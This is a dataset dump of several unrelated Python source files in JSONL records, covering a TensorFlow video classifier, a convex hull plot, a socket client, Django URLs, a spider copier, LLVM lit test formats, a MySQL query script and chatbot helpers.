g_images,labels\n\ndef generate_seqs(images,data_desc,onehot_lab=True):\n idx = []\n runn_idx = 0\n img_seqs = []\n labels = []\n label = None\n tid = 0 \n for _,row in data_desc.iterrows():\n if(tid != row['trackid']):\n if(len(idx)!=0):\n idx = list(map(lambda x: x+runn_idx,idx))\n img_seqs.append(np.array(images[idx]))\n labels.append(label)\n runn_idx = runn_idx + len(idx)\n \n tid = row['trackid']\n idx = [row['framenr']-2] #TODO\n else:\n idx.append(row['framenr']-2)\n label = row['class']\n if(onehot_lab):\n labels = onehot(labels,label_dict={'boat':1,'nature':0})\n return img_seqs,labels\n\ndef fourier_transform(data,only_real=True):\n fft_data = np.fft.rfftn(data,axes=(1,2,3))\n fft_data = (fft_data - np.mean(fft_data))/np.std(fft_data)\n if(only_real):\n fft_data = np.real(fft_data)\n return fft_data\n\ndef surf_extract(img):\n #surf = cv2.xfeatures2d.SURF_create(400)\n #kp, des = surf.detectAndCompute(img, None)\n return None\n\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--dir', type=str, default=\"C:/Users/Elias/Desktop/DB19/Hackathon/MultiFrame_propolsTrackingClassification/\") \n\n args = parser.parse_args()\n data_dir = args.__dict__['dir']\n train_dir = data_dir +'train/'\n test_dir = data_dir +'test/'\n train_imgs,train_labels = load_images(train_dir,resize=96,seq_len=5)\n test_imgs,test_labels = load_images(test_dir,resize=train_imgs.shape[2],seq_len=train_imgs.shape[1])\n # additional_train_imgs = np.repeat(train_imgs[:122,:],4,axis=0)\n # additional_train_labels = np.repeat(train_labels[:122,:],4,axis=0)\n\n # train_imgs = np.concatenate((train_imgs,additional_train_imgs),axis=0)\n # train_labels = np.concatenate((train_labels,additional_train_labels),axis=0)\n surfer_boy,boys = surf_extract(train_imgs[0,0,:])\n # Fourier transform\n fft_train = fourier_transform(train_imgs)\n # PCA??\n\n\n # Random cnn features\n\n # Sift\n\n\n resnet = MobileNetV2(weights='imagenet',pooling = max, include_top = False,input_shape=train_imgs.shape[2:])\n \n reshaped_imgs = np.reshape(train_imgs,(-1,)+train_imgs.shape[2:])\n reshaped_t_imgs = np.reshape(test_imgs,(-1,)+train_imgs.shape[2:])\n\n train_imgs_pp = preprocess_input(reshaped_imgs)\n test_imgs_pp = preprocess_input(reshaped_t_imgs)\n \n train_imgs_feat = resnet.predict(train_imgs_pp)\n test_imgs_feat = resnet.predict(test_imgs_pp)\n \n train_imgs_feat = np.reshape(train_imgs_feat,(train_imgs.shape[:2]+train_imgs_feat.shape[1:]))\n test_imgs_feat = np.reshape(test_imgs_feat,(test_imgs.shape[:2]+test_imgs_feat.shape[1:]))\n\n train_dataset = tf.data.Dataset.from_tensor_slices((train_imgs_feat,train_labels))\n test_dataset = tf.data.Dataset.from_tensor_slices((test_imgs_feat,test_labels))\n n_epochs = 200\n batchsize = 50\n n_samples = train_imgs.shape[0]\n \n train_dataset = train_dataset.shuffle(buffer_size=100,reshuffle_each_iteration=True).batch(batchsize).repeat()\n test_dataset = test_dataset.shuffle(buffer_size=100,reshuffle_each_iteration=True).batch(batchsize)\n\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types,train_dataset.output_shapes)\n next_element = iterator.get_next()\n\n train_iterator = iterator.make_initializer(train_dataset)\n test_iterator = iterator.make_initializer(test_dataset)\n\n ft_extr = feature_extractor()\n\n # abandoned as well:\n #model = ft_extr.create_lstm_model(next_element[0])\n model = ft_extr.small_model(next_element[0])\n #model = ft_extr.create_3dconv_model(next_element[0])\n \n #loss = weighted_ce(next_element[1],model,.1)\n \n # abandoned approaches\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=model,labels=next_element[1]))\n #loss = sparse_cost_sensitive_loss(model,next_element[1],[[1.,1.],[1.,1.]]) #TODO label to onehot\n \n prediction = tf.nn.softmax(model)\n cnf_matrix = tf.math.confusion_matrix(predictions=tf.to_float(tf.argmax(prediction,1)),labels=tf.to_float(tf.argmax(next_element[1], 1)))\n equality = tf.equal(tf.to_float(tf.argmax(prediction,1)), tf.to_float(tf.argmax(next_element[1], 1))) \n accuracy = tf.reduce_mean(tf.to_float(equality))\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.AdamOptimizer(learning_rate=.001).minimize(loss)\n \n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(train_iterator)\n saver = tf.train.Saver()\n\n for epoch in range(n_epochs):\n ep_loss = []\n ep_cnf = []\n for _ in range(int(n_samples/batchsize)):\n _,b_loss,cnf_mat = sess.run([optimizer,loss,cnf_matrix],feed_dict={'is_training:0':True})\n ep_loss.append(b_loss)\n ep_cnf.append(cnf_mat)\n\n print(np.mean(ep_loss))\n print(np.mean(ep_cnf,axis=0))\n if(n_epochs%10==0):\n save_path = saver.save(sess,data_dir+str(epoch)+\"_checkpoint.ckpt\")\n \n print('predicting..')\n save_path = saver.save(sess,data_dir+\"final_checkpoint.ckpt\")\n sess.run(test_iterator)\n result_set = []\n try:\n while True:\n pred = sess.run(prediction,feed_dict={'is_training:0':False})\n result_set.append(pred)\n except:\n pass\n # range\n # sess.run(optimizer,cost)\n # training is false and true sometimes\n \n # save_path = saver.save(sess, \"path.ckpt\")\n # saver.restore(sess, \"path.ckpt\")\n\n result_set = np.vstack(np.array(result_set))\n np.savetxt(data_dir+\"preds.csv\", result_set, delimiter=\",\")\n print(\"done\")\n \n \n \n \n \n\n \n\n \n \n \n \n #for i in img_list:\n\n \n\n \n \n #cv2.cvtColor(csv_dir)\n\n # with tf.Session() as sess:\n # asf = Feature_extractor()\n # comm = MPI.COMM_WORLD\n # rank = comm.Get_rank() # debatable wether i want to think about mpi now..., maybe if it works, put in the effort to make it run on mpi","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"488587524","text":"\n'''dataarray = objectmaker.run()\nprint(len(dataarray))\na = [i[0] for i in dataarray]\nb = [i[1] for i in dataarray]\nc = [i[2] for i in dataarray]\n\n\nx = np.array(a)\ny = np.array(b)\nz = np.array(c)'''\n\n\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import ConvexHull \nimport objectmaker \n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\ndataarray = objectmaker.run()\n\n\npoints= np.array(dataarray)\n\nhull=ConvexHull(points)\n\n\nx = [i[0] for i in points]\ny = [i[1] for i in points]\nz = [i[2] for i in points]\nedges= [x,y,z]\n\n\nfor i in hull.simplices:\n plt.plot(points[i,0], points[i,1], points[i,2], 'r-')\n\nax.plot(edges[0],edges[1],edges[2],'bo') \n\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('z')\n\n\n\nplt.show()\nprint(edges)\n","sub_path":"construction/ConvexHull.py","file_name":"ConvexHull.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"421506186","text":"\"\"\"\nHelper functions.\n\"\"\"\nimport json\n\n\ndef binary_state(value):\n \"\"\"Return a binary for the state of binary sensors\"\"\"\n if value == 'on' or value == True:\n return 1.0\n elif value == 'off' or value == False:\n return 0.0\n else:\n return float('nan')\n\n\ndef ensure_list(*args):\n \"\"\"\n Check if a list is passed, if not convert args to a list.\n\n Parameters\n ----------\n args : single entity or list of entities\n The entities of interest.\n\n Returns\n -------\n list\n A list of entities.\n \"\"\"\n entities = []\n for arg in args:\n if isinstance(arg, list):\n entities += arg\n else:\n entities.append(arg)\n return entities\n\n\ndef isfloat(value):\n \"\"\"\n Check if string can be parsed to a float.\n \"\"\"\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef is_weekday(dtObj):\n \"\"\"Check a datetime object dtObj is a weekday\"\"\"\n if dtObj.weekday() < 5:\n return True\n else:\n return False\n\n\ndef time_category(dtObj):\n \"\"\"Return a time category, bed, home, work, given a dtObj.\"\"\"\n if 9 <= dtObj.hour <= 17:\n return 'daytime'\n elif 5 <= dtObj.hour < 9:\n return 'morning'\n elif 17 < dtObj.hour < 23:\n return 'evening'\n else:\n return 'night'\n\n\ndef load_url(filename):\n \"\"\"Convenience for loading a url from a json file.\"\"\"\n try:\n with open(filename, 'r') as fp:\n url = json.load(fp)\n except Exception as e:\n print('Failed to load url')\n url = None\n return url['url']\n","sub_path":"detective/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"5740064","text":"import socket\nimport time\n\nclass Client():\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.connected = True\n self.sock = None\n\n def connect(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.host, self.port) \n self.sock.connect(server_address) \n print(\"connecting to %s (%s) with %s\" % (self.host, self.port, server_address))\n\n def sendJsonData(self, data):\n print(\"grec\")\n while self.connected:\n try:\n print(\"Connection on {}\".format(port))\n self.sock.send(data)\n self.connected = False\n except Exception as e:\n print(e)\n self.connected = False\n\n print(\"Close\")\n self.sock.close()\n\n #def sendData(data):\n # while continuer:\n # try:\n\t#\t\t #player.play(sock.recv(2048))\n\t#\t data = sock.recv(4096)\n\t#\t if(data == b'CLOSE'):\n\t#\t\t continuer = False\n\t#\t else:\n\t#\t\t player.play(data)\t\t\n\t# except Exception as e:\n\t#\t print(e)\n\t#\t continuer = False\n\n # sock.close()\n # player.closeAudioPlayerStream()\n","sub_path":"src/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"320385285","text":"#coding=utf-8\r\nfrom django.conf.urls import patterns, include, url\r\nfrom django.conf import settings\r\n\r\nurlpatterns = patterns('example',\r\n\r\n (r'^template/$','views.template',),\r\n (r'^sites/$','views.sites',),\r\n (r'^set/$','views.set',),\r\n (r'^registration/$','views.registration',),\r\n (r'^reexamine/$','views.reexamine',),\r\n (r'^information/$','views.information',),\r\n (r'^examine/$','views.examine',),\r\n (r'^catalog/$','views.catalog',),\r\n (r'^admission/$','views.admission',),\r\n)","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"63144789","text":"from __future__ import absolute_import\nimport os\nimport json\nimport six\n\n\nclass CopyError(Exception):\n pass\n\n\nclass SpiderCopier(object):\n \"\"\"\n Utility for copying spiders and items from one project to another.\n\n :source: read data from source project in read_file\n :destination: read and write to destination project in read_file and\n save_files\n \"\"\"\n def __init__(self, source, destination):\n self.source = source\n self.source_files = set(self.list_files(source))\n self.destination = destination\n self.destination_files = set(self.list_files(destination))\n\n def _spider_path(self, spider):\n return 'spiders/%s.json' % spider\n\n def copy(self, spiders, items=None):\n \"\"\"\n Copies the provided spiders and items from the source project to the\n destination project. If spiders have name collisions the copied spider\n will be renamed. In the event of item name collisions a merge will be\n attempted.\n\n :list spiders: List of spiders to copy from the source to the\n destination\n :list items: optional: List of items to copy that may not be scraped\n by the provided spiders\n raises CopyError\n \"\"\"\n if items is None:\n items = []\n spider_paths = set(self._spider_path(s) for s in spiders)\n self._check_missing(spider_paths)\n templates = self._load_templates(spiders)\n combined_items, renamed_items = \\\n self._build_combined_items(templates, items)\n spider_data, renamed_spiders = self._load_spiders(spider_paths)\n templates = self._update_templates(templates, renamed_items,\n renamed_spiders)\n extractors = self._build_combined_extractors(templates)\n self._save_data({\n 'items.json': combined_items,\n 'extractors.json': extractors,\n 'spiders': spider_data,\n 'templates': templates,\n })\n return self._build_summary(spider_paths, items,\n renamed_spiders, renamed_items)\n\n def _refresh_destination_files(self):\n self.destination_files = set(self.list_files(self.destination))\n\n def _check_missing(self, spider_paths):\n \"\"\"\n Check if any of the provided spiders don't exist.\n \"\"\"\n missing = spider_paths - self.source_files\n if missing:\n raise CopyError('Unable to copy spiders as the following spiders '\n 'do not exist in the source project: \"%s\"' %\n '\", \"'.join(missing))\n\n def _load_templates(self, spiders):\n templates = {}\n template_startswith = ['spiders/%s/' % spider for spider in spiders]\n for file_path in self.source_files:\n if any(file_path.startswith(ts) for ts in template_startswith):\n templates[file_path] = self.read_file(self.source, file_path)\n return templates\n\n def _update_templates(self, templates, renamed_items, renamed_spiders):\n \"\"\"\n Handle renamed items during copy.\n \"\"\"\n updated_templates = {}\n for file_path, template in templates.items():\n scrapes = template['scrapes']\n if scrapes in renamed_items:\n template['scrapes'] = renamed_items[scrapes]\n\n spider = file_path.split('/')[1]\n if spider in renamed_spiders:\n template_name = file_path.split('/')[-1]\n spider = renamed_spiders[spider]\n file_path = os.path.join('spiders', spider, template_name)\n updated_templates[file_path] = template\n\n return updated_templates\n\n def _load_spiders(self, spider_paths):\n spiders = {p: self.read_file(self.source, p) for p in spider_paths}\n renamed_spiders = {}\n for spider_path in spiders.keys():\n if spider_path in self.destination_files:\n spider_name = spider_path[8:-5]\n moved_spider = self._rename(spider_name,\n self.destination_files)\n self._refresh_destination_files()\n spiders[moved_spider] = spiders.pop(spider_path)\n if spider_name != moved_spider:\n renamed_spiders[spider_name] = moved_spider[8:-5]\n\n return spiders, renamed_spiders\n\n def _rename(self, name, dest_values, base='spiders/%s_%s%s.json'):\n new_name = base % (name, 'copy', '')\n start = 1\n while new_name in dest_values:\n new_name = base % (name, 'copy', start)\n start += 1\n return new_name\n\n def _build_combined_items(self, templates, items):\n \"\"\"\n Compare items from both source and destination. Merge compatible files,\n copy files that exist in the source and not the destination,\n rename incompatible files.\n \"\"\"\n source_items = self.read_file(self.source, 'items.json')\n dest_items = self.read_file(self.destination, 'items.json')\n renamed_items = {}\n copy_items = set(t['scrapes'] for t in templates.values()\n if 'scrapes' in t)\n for item in items:\n copy_items.add(item)\n for name, item in source_items.items():\n if name not in copy_items:\n continue\n if name in dest_items:\n new_name, item = self._merge_items(name, item,\n dest_items[name],\n list(dest_items.keys()))\n if new_name != name:\n renamed_items[name] = new_name\n name = new_name\n dest_items[name] = item\n return dest_items, renamed_items\n\n def _merge_items(self, name, source, dest, existing):\n source_fields = set(source['fields'])\n dest_fields = set(dest['fields'])\n intersection = source_fields & dest_fields\n if intersection:\n for field in intersection:\n s_field = source['fields'].get(field)\n d_field = dest['fields'].get(field)\n if s_field is None:\n continue\n elif d_field is None and s_field['required']:\n return self._rename(name, existing, '%s_%s%s'), source\n if any(s_field[p] != d_field[p] for p in ('required', 'type')):\n return self._rename(name, existing, '%s_%s%s'), source\n for field in source_fields - dest_fields:\n dest['fields'][field] = source['fields'][field]\n return name, dest\n\n def _build_combined_extractors(self, templates):\n \"\"\"\n Take all extractors needed by the spiders that are being copied and\n add them to the extractors at the destination\n \"\"\"\n source_extractors = self.read_file(self.source, 'extractors.json')\n dest_extractors = self.read_file(self.destination, 'extractors.json')\n for spider in templates.values():\n for extractor in spider.get('extractors', []):\n if (extractor in source_extractors and\n extractor not in dest_extractors):\n dest_extractors[extractor] = source_extractors[extractor]\n return dest_extractors\n\n def _build_summary(self, spider_paths, items, renamed_spiders,\n renamed_items):\n \"\"\"\n Build a summary of copied spiders and items\n \"\"\"\n spiders = [sp[8:-5] for sp in spider_paths]\n items = list(set(items) | set(renamed_items.keys()))\n return {\n 'copied_spiders': spiders,\n 'renamed_spiders': renamed_spiders,\n 'copied_items': items,\n 'renamed_items': renamed_items,\n }\n\n def _save_data(self, data):\n files_data = {}\n for path in data.keys():\n if isinstance(path, six.text_type):\n path = path.encode('utf-8')\n if path.endswith('.json'):\n files_data[path] = json.dumps(data.pop(path),\n sort_keys=True, indent=4)\n else:\n sub_directories = data.pop(path)\n for path in sub_directories.keys():\n if isinstance(path, six.text_type):\n path = path.encode('utf-8')\n files_data[path] = json.dumps(sub_directories.pop(path),\n sort_keys=True, indent=4)\n self.save_files(self.destination, files_data)\n\n def read_file(self, location, filename):\n raise NotImplementedError\n\n def list_files(self, location):\n raise NotImplementedError\n\n def save_files(self, location, files):\n raise NotImplementedError\n\n\nclass FileSystemSpiderCopier(SpiderCopier):\n def __init__(self, source, destination, base_dir='.'):\n self.base_dir = os.path.join(base_dir, '')\n super(FileSystemSpiderCopier, self).__init__(source, destination)\n\n def read_file(self, location, filename):\n with open(os.path.join(self.base_dir, location, filename), 'r') as f:\n return json.loads(f.read())\n\n def list_files(self, location):\n file_paths = []\n project_dir = os.path.join(self.base_dir, location)\n for dir, _, files in os.walk(project_dir):\n dir = dir.split(project_dir)[1]\n dir = dir[1:] if dir.startswith(os.path.sep) else dir\n for filename in files:\n if filename.endswith('.json'):\n file_paths.append(os.path.join(dir, filename))\n return file_paths\n\n def save_files(self, location, files):\n for filename, data in files.items():\n file_path = os.path.join(self.base_dir, location, filename)\n with open(file_path, 'w') as f:\n f.write(data)\n\n\nclass GitSpiderCopier(SpiderCopier):\n\n def __init__(self, source, destination, branch):\n self.branch = branch\n super(GitSpiderCopier, self).__init__(source, destination)\n\n def read_file(self, location, filename):\n f = location.file_contents_for_branch(filename, self.branch)\n if f:\n return json.loads(f)\n else:\n return {}\n\n def list_files(self, location):\n try:\n return location.list_files_for_branch(self.branch)\n except KeyError:\n return location.list_files_for_branch('master')\n\n def save_files(self, location, files):\n return location.save_files(files, self.branch)\n","sub_path":"slyd/slyd/utils/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"604382118","text":"from __future__ import absolute_import\nimport os\n\nimport lit.Test\nimport lit.util\n\n\nclass TestFormat(object):\n def getTestsForPath(self, testSuite, path_in_suite, litConfig, localConfig):\n \"\"\"\n Given the path to a test in the test suite, generates the Lit tests associated\n to that path. There can be zero, one or more tests. For example, some testing\n formats allow expanding a single path in the test suite into multiple Lit tests\n (e.g. they are generated on the fly).\n \"\"\"\n yield lit.Test.Test(testSuite, path_in_suite, localConfig)\n\n###\n\n\nclass FileBasedTest(TestFormat):\n def getTestsForPath(self, testSuite, path_in_suite, litConfig, localConfig):\n \"\"\"\n Expand each path in a test suite to a Lit test using that path and assuming\n it is a file containing the test. File extensions excluded by the configuration\n or not contained in the allowed extensions are ignored.\n \"\"\"\n filename = path_in_suite[-1]\n\n # Ignore dot files and excluded tests.\n if filename.startswith(\".\") or filename in localConfig.excludes:\n return\n\n base, ext = os.path.splitext(filename)\n if ext in localConfig.suffixes:\n yield lit.Test.Test(testSuite, path_in_suite, localConfig)\n\n def getTestsInDirectory(self, testSuite, path_in_suite, litConfig, localConfig):\n source_path = testSuite.getSourcePath(path_in_suite)\n for filename in os.listdir(source_path):\n filepath = os.path.join(source_path, filename)\n if not os.path.isdir(filepath):\n for t in self.getTestsForPath(testSuite, path_in_suite + (filename,), litConfig, localConfig):\n yield t\n\n\n###\n\nimport re\nimport tempfile\n\n\nclass OneCommandPerFileTest(TestFormat):\n # FIXME: Refactor into generic test for running some command on a directory\n # of inputs.\n\n def __init__(self, command, dir, recursive=False, pattern=\".*\", useTempInput=False):\n if isinstance(command, str):\n self.command = [command]\n else:\n self.command = list(command)\n if dir is not None:\n dir = str(dir)\n self.dir = dir\n self.recursive = bool(recursive)\n self.pattern = re.compile(pattern)\n self.useTempInput = useTempInput\n\n def getTestsInDirectory(self, testSuite, path_in_suite, litConfig, localConfig):\n dir = self.dir\n if dir is None:\n dir = testSuite.getSourcePath(path_in_suite)\n\n for dirname, subdirs, filenames in os.walk(dir):\n if not self.recursive:\n subdirs[:] = []\n\n subdirs[:] = [\n d for d in subdirs if (d != \".svn\" and d not in localConfig.excludes)\n ]\n\n for filename in filenames:\n if (\n filename.startswith(\".\")\n or not self.pattern.match(filename)\n or filename in localConfig.excludes\n ):\n continue\n\n path = os.path.join(dirname, filename)\n suffix = path[len(dir) :]\n if suffix.startswith(os.sep):\n suffix = suffix[1:]\n test = lit.Test.Test(\n testSuite, path_in_suite + tuple(suffix.split(os.sep)), localConfig\n )\n # FIXME: Hack?\n test.source_path = path\n yield test\n\n def createTempInput(self, tmp, test):\n raise NotImplementedError(\"This is an abstract method.\")\n\n def execute(self, test, litConfig):\n if test.config.unsupported:\n return (lit.Test.UNSUPPORTED, \"Test is unsupported\")\n\n cmd = list(self.command)\n\n # If using temp input, create a temporary file and hand it to the\n # subclass.\n if self.useTempInput:\n tmp = tempfile.NamedTemporaryFile(suffix=\".cpp\")\n self.createTempInput(tmp, test)\n tmp.flush()\n cmd.append(tmp.name)\n elif hasattr(test, \"source_path\"):\n cmd.append(test.source_path)\n else:\n cmd.append(test.getSourcePath())\n\n out, err, exitCode = lit.util.executeCommand(cmd)\n\n diags = out + err\n if not exitCode and not diags.strip():\n return lit.Test.PASS, \"\"\n\n # Try to include some useful information.\n report = \"\"\"Command: %s\\n\"\"\" % \" \".join([\"'%s'\" % a for a in cmd])\n if self.useTempInput:\n report += \"\"\"Temporary File: %s\\n\"\"\" % tmp.name\n report += \"--\\n%s--\\n\" \"\" % open(tmp.name).read()\n report += \"\"\"Output:\\n--\\n%s--\"\"\" % diags\n\n return lit.Test.FAIL, report\n\n\n###\n\n# Check exit code of a simple executable with no input\nclass ExecutableTest(FileBasedTest):\n def execute(self, test, litConfig):\n if test.config.unsupported:\n return lit.Test.UNSUPPORTED\n\n out, err, exitCode = lit.util.executeCommand(test.getSourcePath())\n\n if not exitCode:\n return lit.Test.PASS, \"\"\n\n return lit.Test.FAIL, out + err\n","sub_path":"llvm/utils/lit/lit/formats/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"247581777","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\nclass Solution(object):\n\n \"\"\"\n Given a string, find the length of the longest substring without \n repeating characters. For example, the longest substring without \n repeating letters for \"abcabcbb\" is \"abc\", which the length is 3. \n For \"bbbbb\" the longest substring is \"b\", with the length of 1.\n \"\"\"\n\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n\n test:\n >>> Solution().lengthOfLongestSubstring(\"abcabcbb\")\n 3\n >>> Solution().lengthOfLongestSubstring(\"bbbbb\")\n 1\n >>> Solution().lengthOfLongestSubstring(\"kkingg\")\n 4\n \"\"\"\n longest, start, visited = 0, 0, [False for _ in xrange(256)]\n for i, c in enumerate(s):\n if visited[ord(c)]:\n while c != s[start]:\n visited[ord(s[start])] = False\n start += 1\n start += 1\n else:\n visited[ord(c)] = True\n longest = max(longest, i - start + 1)\n return longest\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"Python/003_Longest_Substring_Without_Repeating_Characters.py","file_name":"003_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"461847265","text":"#!/usr/bin/python3\n\"\"\"\ntakes in the name of a state as an argument and\nlists all cities of that state, using the database hbtn_0e_4_usa\n\"\"\"\nimport MySQLdb\nfrom sys import argv\n\n\nif __name__ == \"__main__\":\n db = MySQLdb.connect(host=\"localhost\", port=3306,\n user=argv[1], passwd=argv[2], db=argv[3])\n cur = db.cursor()\n sql = \"SELECT cities.name FROM cities JOIN states ON\\\n cities.state_id = states.id WHERE states.name=%s\\\n ORDER BY cities.id\"\n num_rows = cur.execute(sql, (argv[4],))\n rows = cur.fetchall()\n result = []\n i = 0\n for row in rows:\n result.append(rows[i][0])\n i += 1\n joined = \", \".join(result)\n print(joined)\n cur.close()\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249236839","text":"#!/usr/bin/env python3\n#\n__author__ = \"Jakub Lužný\"\n__desc__ = \"TV Prima Videoarchiv\"\n__url__ = r\"http://(www.)?iprima\\.cz/videoarchiv.*\"\n\nimport re,os.path,random,math\nimport xml.etree.ElementTree as ElementTree\nfrom urllib.request import urlopen, Request\n\nclass PrimaEngine:\n\n def __init__(self, url):\n self.url = url\n self.page = urlopen(url).read().decode('utf-8')\n\n def movies(self): \n return [ ('0', re.findall(r'', self.page)[0]) ]\n \n def qualities(self):\n return [ ('high', 'Vysoká'), ('low', 'Nízká')]\n\n def download(self, quality, movie):\n reg = r\"LiveboxPlayer\\.init\\('embed_here.*?','\\d+','\\d+', '(.+\\.mp4)', '(.+\\.mp4)'\"\n r = re.findall(reg, self.page)\n if not r:\n r = re.findall( reg.replace('mp4', 'flv') , self.page)\n hq, lq = r[0]\n \n playpath = \"\"\n if quality == \"low\":\n playpath = lq\n else:\n playpath = hq\n\n playerUrl = 'http://embed.livebox.cz/iprima/player-1.js?__tok{}__={}'.format(\n math.floor(random.random()*1073741824),\n math.floor(random.random()*1073741824))\n \n req = Request(playerUrl, None, {'Referer' : self.url} )\n player = urlopen(req).read().decode('utf-8')\n \n baseUrl = re.findall( r\"stream: '(.+?)'\", player)[0]\n\n return (\"rtmp\", playpath[:-3]+'flv' , { 'url' : baseUrl+'/'+playpath,\n 'rtmpdump_args' : '--live'})\n","sub_path":"engines/prima.py","file_name":"prima.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"135459818","text":"\"\"\"A collection of function for doing my project.\"\"\"\n\n# This imports some extra code, making it available for us to use later\nimport string\nimport random\nimport nltk\nimport time\nimport threading\nfrom threading import Timer\n\n# to check if the input is a question\n# from Assignment 3\ndef is_question(input_string):\n \"\"\"check if the input string is a question\n and returns True if it is\"\"\"\n \n if '?' in input_string:\n output = True\n \n else:\n output = False\n \n return output\n\n# to check if the input is an exclamation\ndef is_exclamation(input_string):\n \"\"\"check if the input is an exclamation\n and returns True if it is\"\"\"\n \n if \"!\" in input_string:\n output = True\n \n else:\n output = False\n \n return output\n\n# to check if the user is giving \n# a positive reply such as \"okay\", \"of course\", \"yeah\" etc.\ndef positive_reply(input_string):\n \"\"\"check if the input includes any of the following words\n and return True if it does\"\"\"\n \n for element in input_string:\n \n if \"okay\" in input_string:\n return True\n \n elif \"of course\" in input_string:\n return True\n \n elif \"sure\" in input_string:\n return True\n \n elif \"yeah\" in input_string:\n return True\n \n elif \"ya\" in input_string:\n return True\n \n elif \"yes\" in input_string:\n return True\n \n return False\n\n# check if the user is tired or doesn't want to talk anymore\n# by check if the input has any of the following words\ndef check_mood(input_string):\n \"\"\"check if the input contains any of the following words\n and returns True if it does\"\"\"\n \n num = 0\n \n if \"...\" in input_string:\n return True\n \n elif \"I'm done\" in input_string:\n return True\n \n elif \"I don't want to talk anymore\" in input_string:\n return True\n \n elif \"I'm tired\" in input_string:\n return True\n \n elif \"dislike\" in input_string:\n return True\n \n elif \"hate\" in input_string:\n return True\n \n return False\n\n# to check if the user is confused about what is happening\n# or if she/he is confused about what she/he can do\ndef very_confused(input_message):\n \"\"\"check if the input contains more than two '?' \n and returns True it does\"\"\"\n \n num = 0\n length = 0\n \n while length <= len(input_message):\n \n if \"??\" in input_message:\n num = num + 1\n \n length = length +1\n \n if num != 0:\n return True\n \n return False\n\n# to agree with the user's input message with a default agree value\ndef agreeable(input_string, agree = \"Me too!!\"):\n \"\"\"concatenate 'Me too!' with the input string\"\"\"\n \n while input_string is not None:\n agreed_output = agree + \" \" + input_string\n \n return agreed_output\n\n# we check if the input_list contains things from check_list\n# if it does, set output to return_list and return output\n# from assignment 3\ndef selector(input_list, check_list, return_list):\n \"\"\"if input_list contains element from check_list\n return a random element in the return_list\"\"\"\n\n output = None\n \n for word in input_list:\n \n if word in check_list:\n output = random.choice(return_list)\n break\n\n return output\n\n# removing all the puncuation in the input string\n# from assignment 3\ndef remove_punctuation(input_string):\n \"\"\"remove all puncuations in input_string\"\"\"\n \n out_string = ''\n \n for char in input_string:\n \n if char not in string.punctuation:\n out_string += char\n \n return out_string\n\n# prepare the the text inputs for processing\n# by removing all the punctuations using remove_punctuation\n# and splitting string into words using the split method\n# from assignment 3\ndef prepare_text(input_string):\n \"\"\"prepare the text input for processing\"\"\"\n \n temp_string = input_string.lower()\n temp_string = remove_punctuation(temp_string)\n out_list = temp_string.split()\n \n return out_list\n\n# Check if there is any words from the input_string that is also any element of list_one\n# from assignment 3\ndef is_in_list(list_one, input_string): \n \"\"\"check if elements of input_string is in list_one\"\"\"\n \n num = 0\n \n for element in list_one:\n \n if element in input_string:\n return True\n \n return False\n\n# find and return an element from list_one\n# that is also in list_two or None otherwise\n# from assignment 3\ndef find_in_list(list_one, list_two):\n \"\"\"Find and return an element from list_one that is in list_two, or None otherwise.\"\"\"\n \n for element in list_one:\n \n if element in list_two:\n return element\n \n return None\n\n# we need a way to end the conversation with the chatbot\n# so if the user input \"quit\" in the input message we will end the chat\n# from assignment 3\ndef end_chat(input_list):\n \"\"\"check if 'quit' is in input_list and end chat\"\"\"\n \n if 'quit' in input_list:\n output = True\n \n else:\n output = False\n \n return output\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
